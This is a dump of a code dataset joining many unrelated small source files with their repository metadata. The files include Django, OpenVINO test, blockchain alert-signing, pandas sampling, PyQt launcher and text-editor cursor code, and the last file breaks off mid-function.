{"foo": lambda: command("foo"), "bar": lambda: command("bar")}
)
assert loader.names == ["foo", "bar"]
| [
"sebastien@eustace.io"
] | sebastien@eustace.io |
1f0b3a8eed50e1cd3ee4c3015c77f80304f757f3 | fa4fc25f5ec49433d4162cfbf34a670f39371973 | /backend/PersoRegBackEnd/manage.py | e931fbf4fb184a1d081960cb1602860d00a97246 | [] | no_license | raultr/PerBackbone | 905e7b020cadeec114744cdb39aa9ff890b704bd | e9277886ca6c9fc6aa9233939e0544c1dcf07d37 | refs/heads/master | 2016-08-03T19:40:40.309758 | 2014-11-27T05:58:22 | 2014-11-27T05:58:22 | 26,204,783 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "PersoRegBackEnd.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"raultr@gmail.com"
] | raultr@gmail.com |
9051d73144ffa7c7785dd0ea1f0e964689305b58 | ef85c7bb57412c86d9ab28a95fd299e8411c316e | /runtime/bindings/python/tests/test_ngraph/test_gather.py | ffa4c20b1d3743b5d5d86692a3379b30b6a541aa | [
"Apache-2.0"
] | permissive | SDxKeeper/dldt | 63bf19f01d8021c4d9d7b04bec334310b536a06a | a7dff0d0ec930c4c83690d41af6f6302b389f361 | refs/heads/master | 2023-01-08T19:47:29.937614 | 2021-10-22T15:56:53 | 2021-10-22T15:56:53 | 202,734,386 | 0 | 1 | Apache-2.0 | 2022-12-26T13:03:27 | 2019-08-16T13:41:06 | C++ | UTF-8 | Python | false | false | 2,717 | py | # Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import openvino.opset8 as ov
import numpy as np
from tests import xfail_issue_54630
from tests.test_ngraph.util import run_op_node
def test_gather():
input_data = np.array(
[1.0, 1.1, 1.2, 2.0, 2.1, 2.2, 3.0, 3.1, 3.2], np.float32
).reshape((3, 3))
input_indices = np.array([0, 2], np.int32).reshape(1, 2)
input_axis = np.array([1], np.int32)
expected = np.array([1.0, 1.2, 2.0, 2.2, 3.0, 3.2], dtype=np.float32).reshape(
(3, 1, 2)
)
result = run_op_node([input_data], ov.gather, input_indices, input_axis)
assert np.allclose(result, expected)
def test_gather_with_scalar_axis():
input_data = np.array(
[1.0, 1.1, 1.2, 2.0, 2.1, 2.2, 3.0, 3.1, 3.2], np.float32
).reshape((3, 3))
input_indices = np.array([0, 2], np.int32).reshape(1, 2)
input_axis = np.array(1, np.int32)
expected = np.array([1.0, 1.2, 2.0, 2.2, 3.0, 3.2], dtype=np.float32).reshape(
(3, 1, 2)
)
result = run_op_node([input_data], ov.gather, input_indices, input_axis)
assert np.allclose(result, expected)
def test_gather_batch_dims_1():
input_data = np.array([[1, 2, 3, 4, 5],
[6, 7, 8, 9, 10]], np.float32)
input_indices = np.array([[0, 0, 4],
[4, 0, 0]], np.int32)
input_axis = np.array([1], np.int32)
batch_dims = 1
expected = np.array([[1, 1, 5],
[10, 6, 6]], np.float32)
result = run_op_node([input_data], ov.gather, input_indices, input_axis, batch_dims)
assert np.allclose(result, expected)
@xfail_issue_54630
def test_gather_negative_indices():
input_data = np.array(
[1.0, 1.1, 1.2, 2.0, 2.1, 2.2, 3.0, 3.1, 3.2], np.float32
).reshape((3, 3))
input_indices = np.array([0, -1], np.int32).reshape(1, 2)
input_axis = np.array([1], np.int32)
expected = np.array([1.0, 1.2, 2.0, 2.2, 3.0, 3.2], dtype=np.float32).reshape(
(3, 1, 2)
)
result = run_op_node([input_data], ov.gather, input_indices, input_axis)
assert np.allclose(result, expected)
@xfail_issue_54630
def test_gather_batch_dims_1_negative_indices():
input_data = np.array([[1, 2, 3, 4, 5],
[6, 7, 8, 9, 10]], np.float32)
input_indices = np.array([[0, 1, -2],
[-2, 0, 0]], np.int32)
input_axis = np.array([1], np.int32)
batch_dims = 1
expected = np.array([[1, 2, 4],
[9, 6, 6]], np.float32)
result = run_op_node([input_data], ov.gather, input_indices, input_axis, batch_dims)
assert np.allclose(result, expected)
| [
"noreply@github.com"
] | SDxKeeper.noreply@github.com |
6c3c28ac807f8427e5aebe618184ced6913751fb | 07e6fc323f657d1fbfc24f861a278ab57338b80a | /python/pySimE/space/data/table_ChemicalFuels.py | 5adc81686a9a3146a15ceb9362c724897ff52ed8 | [
"MIT"
] | permissive | ProkopHapala/SimpleSimulationEngine | 99cf2532501698ee8a03b2e40d1e4bedd9a12609 | 47543f24f106419697e82771289172d7773c7810 | refs/heads/master | 2022-09-05T01:02:42.820199 | 2022-08-28T10:22:41 | 2022-08-28T10:22:41 | 40,007,027 | 35 | 4 | null | null | null | null | UTF-8 | Python | false | false | 355 | py |
dict_AirBurnFuel = {
# name energyDensity energyDensity+O2 density
'LH2' : [ 141.86, 15.7622222222, 0.07085 ],
'LCH4': [ 55.6, 11.12, 0.42262 ],
'gasoline': [ 42.8, 0.7197]
}
dict_ChemicalFuelCompositions = {
# name fuel oxidizer energyDensity exhaustVelocity
'LOX/LH2' : ["H2", "O2", 141.86, 4 ],
'LOX/LH2' : []
} | [
"ProkopHapala@gmail.com"
] | ProkopHapala@gmail.com |
80a8d87c8b06eed099d2a9ed2758407c5cd9490a | 7b76e80f2057d78a721373e8818e153eecebe8f0 | /Examples/functions/lambda with re.py | 824e7e963ca5fd04df7e567717b169cfd8b5ef9d | [] | no_license | dev-area/Python | c744cf6eb416a74a70ad55d2bcfa8a6166adc45d | 1421a1f154fe314453d2da8b0fafae79aa5086a6 | refs/heads/master | 2023-02-01T10:37:47.796198 | 2020-10-15T19:33:49 | 2020-10-15T19:33:49 | 86,337,870 | 35 | 44 | null | 2023-01-12T09:02:59 | 2017-03-27T13:20:49 | Jupyter Notebook | UTF-8 | Python | false | false | 1,165 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu May 11 17:40:55 2017
@author: parallels
"""
def addtax(val):
return val*1.17
nums = [10,200,30]
inters = [1.17,1.18,1.16]
numstax = map(addtax,nums)
print numstax
numstax = map(lambda val:val*1.17,nums)
print numstax
numstax = map(lambda val,inter:val*inter,nums,inters)
print numstax
maxval = reduce(lambda a,b: a if (a > b) else b,nums)
print maxval
import re
codes = {}
names = ['zero','wun','two','tree','fower','fife','six','seven',
'ait','niner','alpha','bravo','charlie','delta','echo',
'foxtrot','golf','hotel','india','juliet','kilo','lima',
'mike','november','oscar','papa','quebec','romeo',
'sierra','tango','uniform','victor','whisky','xray',
'yankee','zulu']
for key in (xrange(0,10)):
codes[str(key)] = names[key]
for key in (xrange(ord('A'),ord('Z')+1)):
codes[chr(key)] = names[key - ord('A')+10]
reg = 'WG07 OKD'
result = re.sub(r'(\w)',
lambda m: codes[m.groups()[0]]+' ', reg)
testy = 'The quick brown fox the jumps over the lazy dog'
m = re.search(r"(quick|slow).*(the|camel)", testy)
| [
"liranbh@gmail.com"
] | liranbh@gmail.com |
f21a38c18c4969ba4ffb413b52af5cf14d3ccf8c | 55c0df26e4891310a88e5245c41f3ffd1dbcd143 | /list_and_sting9.py | f94e9989913ef9f40170697bbcf4857e2b7152bf | [] | no_license | yiguming/coding | 506446a6ab0d4c63c74a3b90bceeff8d1db78b57 | d3d516a0719c9ba5b5a18d31714dd32601f05f4f | refs/heads/master | 2016-09-03T07:11:11.822498 | 2015-03-07T12:52:56 | 2015-03-07T12:52:56 | 31,662,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | #!/usr/bin/python
def connectlist(list1,list2):
for item in list2:
list1.append(item)
return list1
list1=[1,2,3,4,5]
list2=[2,3,4,5,1,2]
print connectlist(list1,list2)
| [
"439309415@qq.com"
] | 439309415@qq.com |
56d459bb14c3167b06507f072a6f520affe19dee | 1020a87ba3569c879478b6a88f73da606f204c34 | /greendoge/util/validate_alert.py | 0427b5cf2f4fbde8303fe845c999df00e41390c3 | [
"Apache-2.0"
] | permissive | MIGPOOL/test-blockchain | deeceaa5d7c6d24e528092ef32036aff8149baff | 567fd1265b6a27f2f4e21c7787e39072e4b7c085 | refs/heads/main | 2023-08-22T03:27:19.638361 | 2021-10-26T22:42:42 | 2021-10-26T22:42:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,749 | py | import json
from pathlib import Path
from blspy import AugSchemeMPL, PublicKeyMPL, SignatureMPL
from greendoge.util.byte_types import hexstr_to_bytes
from greendoge.util.hash import std_hash
def validate_alert_file(file_path: Path, pubkey: str) -> bool:
text = file_path.read_text()
validated = validate_alert(text, pubkey)
return validated
def validate_alert(text: str, pubkey: str) -> bool:
json_obj = json.loads(text)
data = json_obj["data"]
message = bytes(data, "UTF-8")
signature = json_obj["signature"]
signature = SignatureMPL.from_bytes(hexstr_to_bytes(signature))
pubkey_bls = PublicKeyMPL.from_bytes(hexstr_to_bytes(pubkey))
sig_match_my = AugSchemeMPL.verify(pubkey_bls, message, signature)
return sig_match_my
def create_alert_file(alert_file_path: Path, key, genesis_challenge_preimage: str):
bytes_preimage = bytes(genesis_challenge_preimage, "UTF-8")
genesis_challenge = std_hash(bytes_preimage)
file_dict = {
"ready": True,
"genesis_challenge": genesis_challenge.hex(),
"genesis_challenge_preimage": genesis_challenge_preimage,
}
data: str = json.dumps(file_dict)
signature = AugSchemeMPL.sign(key, bytes(data, "utf-8"))
file_data = {"data": data, "signature": f"{signature}"}
file_data_json = json.dumps(file_data)
alert_file_path.write_text(file_data_json)
def create_not_ready_alert_file(alert_file_path: Path, key):
file_dict = {
"ready": False,
}
data: str = json.dumps(file_dict)
signature = AugSchemeMPL.sign(key, bytes(data, "utf-8"))
file_data = {"data": data, "signature": f"{signature}"}
file_data_json = json.dumps(file_data)
alert_file_path.write_text(file_data_json)
| [
"83430349+lionethan@users.noreply.github.com"
] | 83430349+lionethan@users.noreply.github.com |
fd2c477fcf5e490a75267f92c43ca77e689469dc | b4164c87460840fff47ee84929834624d07b346c | /tools.py | c77d1712a27642381dc2faa413e09415a8fa666d | [] | no_license | tlinnet/winpython | 23ffc5b4689731d9ee31a2c22e6924c6af68f545 | febc9eaa4d0ce7dc3d632a90cfb5ca29f72504a1 | refs/heads/master | 2021-01-23T23:45:19.209163 | 2018-03-04T14:44:59 | 2018-03-04T14:44:59 | 122,732,431 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,224 | py | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.mlab as mlab
# https://stackoverflow.com/questions/4700614/how-to-put-the-legend-out-of-the-plot
d = {
'Alder':{
'18-24':0.12,
'25-34':0.16,
'35-44':0.19,
'45-54':0.19,
'55-64':0.17,
'65+':0.09,
'18-':0.08,
},
'Køn':{
'M':0.51,
'K':0.49
},
'Region':{
'Hovedstaden':0.30,
'Sjælland':0.14,
'Syddanmark':0.21,
'Midtjylland':0.22,
'Nordjylland':0.11,
'Ved ikke':0.02,
}
}
def get_sample_ind(N=1000, dists=None):
all_sample = []
for i in range(N):
sample = []
for dist in dists:
groups = list(dist.keys())
props = [dist[j] for j in groups]
#print(groups, np.sum(props))
s = np.random.choice(groups, 1, p=props)
sample.append(s[0])
#print(sample)
all_sample.append(sample)
return all_sample
def get_sample(N=1000, dists=None):
sample = []
for dist in dists:
groups = list(dist.keys())
props = [dist[j] for j in groups]
#print(groups, np.sum(props))
s = np.random.choice(groups, N, p=props)
sample.append(list(s))
# Zip together
all_sample = list(zip(*sample))
return all_sample
def get_std_sample(N=1000):
# Create dataframe
labels = ['Alder', 'Køn', 'Region']
# Define a distribution
dists = [d[labels[0]], d[labels[1]], d[labels[2]]]
sample = get_sample(N=N, dists=dists)
# Make data frame
df = pd.DataFrame.from_records(sample, columns=labels)
df['Alle'] = pd.Series(['Alle']*N, index=df.index)
df['val'] = pd.Series(np.ones(N), index=df.index)
# Create info
df_i = {}
for label in labels:
# Count by labels
df_s = df.groupby(label)[label].count() / df[label].count() * 100
# Create a pandas Series
d_s = pd.Series(d[label]) * 100
d_s.name = label+"_DST"
# Concat
df_c = pd.concat([df_s, d_s], axis=1)
df_i[label] = df_c
return df, df_i
def create_rand_series(df=None, x_avg=None, ex=None):
N = len(df.index)
# From the fractional / relative uncertainty, calculate the standard deviation
sigma = ex * x_avg
rand_nrs = sigma * np.random.randn(N) + x_avg
# Create Series
s = pd.Series(rand_nrs, index=df.index)
return s
def create_boxplot_hist(df=None, col=None):
# Plot histogram af punkters
f, (ax1, ax2) = plt.subplots(2,1, figsize=(10,5), sharex=True, gridspec_kw={'height_ratios': [1, 2]})
f.subplots_adjust(hspace=0)
v = df[col]
ax1.boxplot(v, notch=False, sym=None, vert=False)
mean = np.mean(v)
sigma = np.std(v)
x = np.linspace(min(v), max(v), len(v))
# Plot
ax2.hist(v, normed=True, bins=20)
p = ax2.plot(x, mlab.normpdf(x, mean, sigma))
c = p[-1].get_color()
ax2.axvline(x=180, c="k")
ax2.axvline(x=mean, c=c)
ax2.axvline(x=mean+sigma, c="b")
ax2.axvline(x=mean-sigma, c="b")
ax2.axvline(x=mean+2*sigma, c="b")
ax2.axvline(x=mean-2*sigma, c="b")
return f, ax1, ax2, mean, sigma | [
"tlinnet@gmail.com"
] | tlinnet@gmail.com |
ce4ba75c7a043617174f004cdba4560d1e3f1e77 | 76fa6f5571e983de2ed7c71424377442d38ab326 | /enemies/base_enemy.py | 6c53ebea9540ef3a2a4b4d9c7109f085d5eacf17 | [] | no_license | Asingjr2/dungeon_quest_py | 1463f28b94a7a4a0e7263f184803e627bd88b97c | 41c9b41485f552657405ddb977ddfa86a02cc162 | refs/heads/master | 2021-06-11T05:14:00.295784 | 2020-10-19T12:47:55 | 2020-10-19T12:47:55 | 128,494,057 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,456 | py | """Module contains base type for enemies user will face."""
class Enemy(object):
"""Base class of enemy that will attack heroes.
Attributes include name, health, strength, defense, and intelligence.
Methods include checks for living, being on the ground, and description
of all character stats.
"""
def __init__(self, name, hp, mp, str_, def_, intel=0):
self.name = name
self._health = hp
self.magic = mp
self.strength = str_
self.defense = def_
self.intelligence = intel
@property
def health(self):
return self._health
@health.setter
def health(self, health):
"""Attribute setting with validation using python getter and setter."""
if health <=0:
raise ValueError("Health cannot be less than 0")
self._health = health
@property
def current_hp(self):
return self.current_health
def is_alive(self):
"""Checks to see if character's current health is above 0."""
if self.current_health > 0:
return True
else:
self.is_alive = False
return self.is_alive
def current_stats(self):
"""Returns description of all enemy stats."""
return print("Name = {}, Health = {}, Magic = {}, Strength = {}, Defense = {}, Intelligence = {}".format(self.name, self._health, self.magic, self.strength, self.defense, self.intelligence))
| [
"asingjr2@gmail.com"
] | asingjr2@gmail.com |
1f88bca8dd36585531b75d379ab5f21077a612ed | 7a3c194356437db110671ad163f03df1344a5e87 | /code/validation/common.py | 941d55ff442c7ccadd8612c3d61f2711fa5297ed | [
"MIT"
] | permissive | dmytrov/gaussianprocess | 6b181afdb989415ec929197cdb20efee571ebbcc | 7044bd2d66f44e10656fee17e94fdee0c24c70bb | refs/heads/master | 2022-12-08T22:23:11.850861 | 2020-09-14T19:37:33 | 2020-09-14T19:37:33 | 295,513,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,101 | py | import os
import time
import pickle
import logging
import numpy as np
import dataset.mocap as ds
import numerical.numpyext.logger as npl
import ml.dtw.dynamictimewarp as dtw
import matplotlib.pyplot as plt
def DTW_errors(observed, predicted):
"""
observed : [T, N] - observed data
predicted : [T, N] - predicted (generated by a model) data
"""
N = observed.shape[1]
var = np.sqrt(np.sum((observed - np.mean(observed, axis=0))**2))
odist, opath = dtw.dynTimeWarp(observed / var, predicted / var,
transitions=[(1, 1, 0.0), (0, 1, N*0.0001), (1, 0, N*0.0001)])
warp_dist_err = odist
wgen = np.array([predicted[i[0]] for i in opath])
wtra = np.array([observed[i[1]] for i in opath])
#plt.plot(wtra[:, :3] / var, "--")
#plt.gca().set_prop_cycle(None)
#plt.plot(wgen[:, :3] / var)
#plt.show()
warp_path_mean_sqr_err = np.mean((wgen - wtra)**2)
return warp_dist_err, warp_path_mean_sqr_err
def compute_errors(observed, predicted):
"""
observed : [T, N] - observed data
predicted : [T, N] - predicted (generated by a model) data
returns : (mse, tre, warp_dyn, warp_lvm)
mse : mean square error
warp_dyn : time error of the warping
warp_lvm : residual error after warping alignment
"""
#print(observed.shape, predicted.shape)
o = observed - np.mean(observed, axis=0)
p = predicted - np.mean(predicted, axis=0)
mse = np.mean((o - p)**2)
warp_dyn, warp_path_mean_sqr_er = DTW_errors(o, p)
errors = {"MSE": mse,
"WRAP_DYN": warp_dyn,
"WRAP_PATH": warp_path_mean_sqr_er}
return errors
def all_combinations(params):
if len(params) == 1:
return [[param] for param in params[0]]
else:
return [combination + [param] for combination in all_combinations(params[:-1]) for param in params[-1]]
def all_combinations_from_dict(params):
return [zip(params.keys(), c) for c in all_combinations(params.values())]
def all_combinations_from_listoftuples(params):
keys = [key for key, value in params]
values = [value for key, value in params]
return [zip(keys, c) for c in all_combinations(values)]
class ModelIterator(object):
def __init__(self):
self.recording = None
self.bodypart_motiontypes = None
self.partitioner = None
self.parts_IDs = None
self.nparts = None
self.trial = None
self.settings = {}
self.params_range = None
self.directory = time.strftime("%Y-%m-%d-%H.%M.%S")
def load_recording(self, recording, bodypart_motiontypes, max_chunks=None):
# Load data
self.recording = recording
self.bodypart_motiontypes = bodypart_motiontypes
self.partitioner, self.parts_IDs, trials, starts_ends = ds.load_recording(
recording=self.recording,
bodypart_motiontypes=bodypart_motiontypes,
max_chunks=max_chunks)
self.trial = trials[0]
self.nparts = np.max(self.parts_IDs) + 1
def iterate_all_settings(self, func_callback, i_model=None):
# Iterate all settings
for i, params in enumerate(all_combinations_from_listoftuples(self.params_range)):
if i_model is None or i_model == i:
try:
if not os.path.exists(self.directory):
os.makedirs(self.directory)
self.settings.update(params)
self.settings["directory"] = self.directory + "/" + \
"-".join(["{}({})".format(param[0], param[1]) for param in params])
npl.setup_root_logger(rootlogfilename="{}/rootlog.txt".format(self.directory), removeoldlog=False)
pl = logging.getLogger(__name__)
pl.info("Working directory: " + self.settings["directory"])
func_callback(settings=self.settings,
trial=self.trial,
bvhpartitioner=self.partitioner)
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
npl.setup_root_logger(rootlogfilename="{}/rootlog.txt".format(self.directory), removeoldlog=False)
pl = logging.getLogger(__name__)
pl.exception(e)
class ErrorStatsReader(object):
def __init__(self):
self.errs = []
self.params_range = None
self.errorsfilename = "errors.pkl"
def read_learned_errors_from_file(self, errfilename, param=None):
try:
with open(errfilename, "rb") as filehandle:
e = pickle.load(filehandle)
if "settings" not in e:
e["settings"] = param
self.errs.append(e)
print("Loaded {}".format(errfilename))
except:
print("Failed to load {}".format(errfilename))
def read_learned_errors(self, settings, trial, bvhpartitioner=None):
errfilename = settings["directory"] + "/" + self.errorsfilename
print("os.getcwd()", os.getcwd())
self.read_learned_errors_from_file(errfilename)
def to_tensor(self, key, params_range=None, filter=None):
if params_range is None:
params_range = self.params_range
a = np.nan * np.zeros([len(pr) for pn, pr in params_range])
for s in self.errs:
try:
if filter is None or filter(s):
inds = tuple((pr.index(s["settings"][pn]) for pn, pr in params_range))
a[inds] = s[key]
except (KeyError, ValueError):
pass
return a
def select_by(tensor_axes, tensor_value, params):
"""
tensor_axes: N*(axisname, M*axisvalue)
tensor_value:
params
"""
keys = [key for key, value in params]
values = [value for key, value in params]
paramsdict = dict(zip(keys, values))
inds = tuple((pr.index(paramsdict[pn]) if pn in paramsdict else slice(None) for pn, pr in tensor_axes))
res_axes = [tl for tl in tensor_axes if tl[0] not in paramsdict]
res_data = tensor_value[inds]
#res_data = np.squeeze(res_data) # no need to squeeze?
return res_axes, res_data
def iterate_by(tensor_axes, tensor_value, iter_params_keys):
iter_range = [(k, v) for k, v in tensor_axes if k in iter_params_keys]
iter_combs = all_combinations_from_listoftuples(iter_range)
for iter_comb in iter_combs:
res_axes, res_data = select_by(tensor_axes, tensor_value, iter_comb)
yield iter_comb, res_axes, res_data
def mean_std(tensor_axes, tensor_value, alongs):
ialong = tuple([[pn for pn, pr in tensor_axes].index(along) for along in alongs])
return np.nanmean(tensor_value, axis=ialong), np.nanstd(tensor_value, axis=ialong)
def values_by_name(tensor_axes, name):
keys = [key for key, value in tensor_axes]
values = [value for key, value in tensor_axes]
paramsdict = dict(zip(keys, values))
return paramsdict[name]
| [
"dmytro.velychko@gmail.com"
] | dmytro.velychko@gmail.com |
c711d02dde7081b2daf943ff693527fd569f8976 | 50afc0db7ccfc6c80e1d3877fc61fb67a2ba6eb7 | /challenge8(theater_escape)/GameSwap.py | a30610d08430f0282964baf30207ac0ae6496db5 | [
"MIT"
] | permissive | banana-galaxy/challenges | 792caa05e7b8aa10aad8e04369fc06aaf05ff398 | 8655c14828607535a677e2bb18689681ee6312fa | refs/heads/master | 2022-12-26T23:58:12.660152 | 2020-10-06T13:38:04 | 2020-10-06T13:38:04 | 268,851,516 | 11 | 8 | MIT | 2020-09-22T21:21:30 | 2020-06-02T16:24:41 | Python | UTF-8 | Python | false | false | 632 | py | def whichExit(cinema):
currentRow, currentColumn, left, right, i = 0, 0, 0, 0, 0
for row in cinema:
for sit in row:
if sit == 0: currentRow = row.index(sit); currentColumn = cinema.index(row)
for column in range(currentColumn + 1):
for _ in cinema[column]:
if i < currentRow:
left += 0 if cinema[column][i] == -1 else 1
elif i == currentRow: i += 1; continue
else: right += 0 if cinema[column][i] == -1 else 1
i += 1
i = 0
if left == right: return "same"
elif left > right: return "right"
else: return "left" | [
"cawasp@gmail.com"
] | cawasp@gmail.com |
4be069bfe0d7d032b935a0fe9cedcb43b976a562 | 60c76946c54317472326214aec8e4c40e65e557f | /apps/courses/apps.py | d4899479cca4763a1de33d02b311b8044ee98ee1 | [] | no_license | Aiyane/Xuehai | 73b3d3043016d05000dd951e5b69165c181d14c6 | 6bf67eb97c1543defaa97e2f77c7b8bd0e89bcb8 | refs/heads/master | 2020-03-23T00:26:18.065304 | 2018-07-14T12:41:30 | 2018-07-14T12:41:30 | 140,863,193 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 141 | py | # -*- coding:utf-8 -*-
from django.apps import AppConfig
class CoursesConfig(AppConfig):
name = 'courses'
verbose_name = u"课程"
| [
"2310091880qq@gmail.com"
] | 2310091880qq@gmail.com |
37d8ec1c84f8b1397fcfb43e3196fa78ce8a2c30 | 40d3f558e2a7180f6ce87a74885ae6261f523201 | /SettingRTSystem/SettingRTSystem/SettingRTSystem.py | f8a98a1ba77313655a112b464c7e129cbd0ee2ca | [] | no_license | n-kawauchi/openrtm_utils | 1e1db8666dfdde335b5f9d7e1015fe4be305dd7a | 309b653075611e5668a371ff5d0820b5dd6207dc | refs/heads/master | 2020-06-13T08:21:27.789797 | 2018-03-27T23:57:41 | 2018-03-27T23:57:41 | 194,598,946 | 0 | 0 | null | 2019-07-01T04:20:49 | 2019-07-01T04:20:49 | null | UTF-8 | Python | false | false | 2,644 | py | #!/bin/env python
# -*- encoding: utf-8 -*-
##
# @file SettingRTCConf.py
# @brief 複合コンポーネント作成支援ツール
import thread
import sys,os,platform
import re
import time
import random
import commands
import math
import imp
import subprocess
import rtctree.tree
import RTC
import OpenRTM_aist
from OpenRTM_aist import CorbaNaming
from OpenRTM_aist import RTObject
from OpenRTM_aist import CorbaConsumer
from omniORB import CORBA
import CosNaming
from PyQt4 import QtCore, QtGui
import SettingRTCWindow.MainWindow
import SettingRTSystem_rc
if "RTM_ROOT" in os.environ:
rtm_root = os.environ["RTM_ROOT"]
else:
rtm_root = ".\\"
##
# @brief メイン関数
def main():
#mgrc = ManagerControl("")
app = QtGui.QApplication([""])
#splash_pix = QtGui.QPixmap(':/images/splash_loading.png')
#splash = QtGui.QSplashScreen(splash_pix, QtCore.Qt.WindowStaysOnTopHint)
#splash.setMask(splash_pix.mask())
#splash.show()
#app.processEvents()
if "SettingRTSystemPath" in os.environ:
tool_path = os.environ["SettingRTSystemPath"]
else:
tool_path = "./"
if os.name == 'posix':
#process_rtcd = subprocess.Popen("python Manager/Python/rtcd.py -f Manager/Python/rtc.conf".split(" "))
cmd = "sh " + str(os.path.join(tool_path,"rtcConfSet.sh"))
process_confset = subprocess.Popen(cmd.split(" "))
#process_confset = os.system("sh rtcConfSet.sh&")
elif os.name == 'nt':
#process_rtcd = subprocess.Popen("python Manager/Python/rtcd.py -f Manager/Python/rtc.conf")
#process_rtcd = os.system("start python Manager/Python/rtcd.py -f Manager/Python/rtc.conf")
if "TOOLEXE" in os.environ and os.environ["TOOLEXE"]=="TRUE":
cmd = "\""+str(os.path.join(rtm_root,"utils\\python_dist","rtcConfSet.exe"))+"\" -f rtc.conf"
else:
cmd = "python " + "\""+str(os.path.join(tool_path,"rtcConfSet\\rtcConfSet.py"))+"\" -f rtc.conf"
cmd = cmd.replace("/","\\")
process_confset = subprocess.Popen(cmd)
#process_confset = os.system("start rtcConfSet.bat")
mainWin = SettingRTCWindow.MainWindow.MainWindow()
mainWin.show()
#splash.finish(mainWin)
app.exec_()
if os.name == 'posix':
cmd = "python " + str(os.path.join(tool_path,"exitRTCs.py"))
subprocess.Popen(cmd.split(" "))
elif os.name == 'nt':
cmd = "python " + "\""+str(os.path.join(tool_path,"exitRTCs.py"))+"\""
subprocess.Popen(cmd)
if __name__ == "__main__":
main()
| [
"TyouKyozyakuTaisitu@yahoo.co.jp"
] | TyouKyozyakuTaisitu@yahoo.co.jp |
05d2b69daf2bd2f12575ea0d0a55ca2d755e4171 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02954/s152942454.py | 4b7a332bd983d684b4ceffe3f57347d3e95b1dc6 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | S = input() + 'R'
R = 0
L = 0
ans = [0] * (len(S))
for i in range(len(S)):
if S[i] == 'R':
R += 1
if L > 0:
ans[i - L] += (L + 1) // 2
ans[i - L - 1] += L // 2
L = 0
elif S[i] == 'L':
L += 1
if R > 0:
ans[i] += R // 2
ans[i - 1] += (R + 1)// 2
R = 0
print(*ans[:-1])
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
f7cb01407737d3666553798bf4aa5a31c452c46f | bc2a85e8dd9244f89e2f1801cc19d570a87c74ed | /CompanyChallenges/company_sp/src/main.py | 5debbfa2009478435dd06d18b476596672888341 | [] | no_license | christian-miljkovic/interview | 1cab113dbe0096e860a3ae1d402901a15e808e32 | 63baa1535b788bc3e924f3c24a799bade6a2eae3 | refs/heads/master | 2023-01-11T14:53:09.304307 | 2020-02-04T17:35:12 | 2020-02-04T17:35:12 | 193,549,798 | 0 | 0 | null | 2023-01-05T05:56:15 | 2019-06-24T17:28:50 | Python | UTF-8 | Python | false | false | 5,406 | py | # import socket library
import socket
import sys
import collections
class Cursor(object):
def __init__(self, screen):
self.top_pad = 0
self.left_pad = 0
self.color = '#0000ff'
self.pixel_size = {'width':8, 'height':14}
# 2D array representing screen
self.screen = screen
self.pos = {'row':0, 'col':0}
self.at_end = True
def move(self, command):
if command == 'right':
self.move_right()
elif command == 'left':
self.move_left()
elif command == 'up':
self.move_up()
elif command == 'down':
self.move_down()
def move_up(self):
curr_row = self.pos['row']
curr_col = self.pos['col']
if curr_row - 1 >= 0:
if curr_col - 1 == 0:
self.pos['col'] = len(self.screen[curr_row - 1]) - 1
self.pos['row'] -= 1
def move_down(self):
curr_row = self.pos['row']
curr_col = self.pos['col']
if curr_row + 1 < len(self.screen):
if curr_col > len(self.screen[curr_row + 1]):
self.pos['col'] = len(self.screen[curr_row + 1]) - 1
self.pos['row'] += 1
def move_right(self):
curr_row= self.pos['row']
curr_col = self.pos['col']
if curr_row < len(self.screen) and curr_col < len(self.screen[curr_row]) - 1:
self.pos['col'] += 1
else:
self.move_down()
def move_left(self):
curr_row = self.pos['row']
curr_col = self.pos['col']
if curr_row < len(self.screen) and curr_col - 1 >= 0:
self.pos['col'] -= 1
elif curr_row - 1 >= 0:
self.pos['row'] -= 1
self.pos['col'] = len(self.screen[curr_row - 1]) - 1
def flatten_position(self):
return (len(self.screen[0]) * self.pos['row'] + self.pos['col']) - 1
def pos_to_command(self):
top_pad = self.pos['row'] * self.pixel_size['height']
left_pad = self.pos['col'] * self.pixel_size['width']
return 'rect,{},{},8,14,#FF0000\n'.format(left_pad, top_pad)
class TextEditor(object):
def __init__(self):
self.screen = [[""]]
self.arr = []
self.screen_width = 800
self.screen_height = 600
self.cursor = Cursor(self.screen)
self.update_cursor = True
self.commands = {'return':'\n', 'space': ' '}
def perform_command(self, command):
if type(command).__name__ == 'key':
if command.value in ['left','right','up','down']:
self.cursor.move(command.value)
self.update_cursor = False
else:
self.generic_key_down(command.value)
elif type(command).__name__ == 'window':
self.screen_width = command.width
self.screen_height = command.height
def generic_key_down(self, value):
insert_value = value
if value in self.commands:
insert_value = self.commands[value]
index = self.cursor.flatten_position()
if index < len(self.arr) - 1:
self.arr.insert(index, insert_value)
else:
self.arr.append(insert_value)
def array_to_screen(self):
row = 0
cursor_commands = []
wrap_count = 0
for index, char in enumerate(self.arr):
print(wrap_count * 8, self.screen_width)
if 'backspac' in char:
if len(self.screen[row]) == 1:
if row != 0:
del self.screen[row]
cursor_commands.append('up')
row -= 1
else:
self.screen[row].pop()
cursor_commands.append('left')
del self.arr[index]
if index - 1 >= 0:
